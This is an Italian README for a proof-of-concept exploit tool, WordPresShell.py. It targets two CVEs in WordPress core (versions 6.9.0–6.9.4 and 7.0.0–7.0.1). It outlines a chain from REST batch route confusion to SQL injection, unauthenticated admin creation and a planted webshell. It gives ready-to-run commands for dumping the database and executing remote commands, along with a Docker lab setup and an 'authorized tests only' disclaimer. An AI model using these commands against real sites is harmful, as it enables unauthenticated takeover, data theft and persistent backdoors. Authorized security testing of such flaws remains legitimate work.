
PoC di RCE pre-autenticazione per CVE-2026-63030 / CVE-2026-60137 (core WordPress)
PoC di RCE pre-autenticazione per CVE-2026-63030 e CVE-2026-60137 (core di WordPress).
Confusione di route REST /batch/v1 → SQLi in WP_Query author__not_in → creazione di un admin senza autenticazione → webshell. File singolo, solo stdlib Python.
Vulnerabilità: Adam Kues (Searchlight Cyber). Versioni interessate: 6.9.0–6.9.4, 7.0.0–7.0.1. Risolta in: 6.9.5 / 7.0.2.
python3 WordPresShell.py check http://target # confirm (non-destructive)
python3 WordPresShell.py dump http://target [--query "SELECT @@version"]
python3 WordPresShell.py shell http://target --cmd "id" # crack-free RCE
python3 WordPresShell.py shell http://target -i # interactive
python3 WordPresShell.py shell http://target --user U --password P --cmd id
docker compose up -d # WordPress 7.0.1 on :8092
docker compose down -v # teardown
shell crea un admin e deposita una webshell — rimuovi entrambi dopo il test.
Solo per test autorizzati.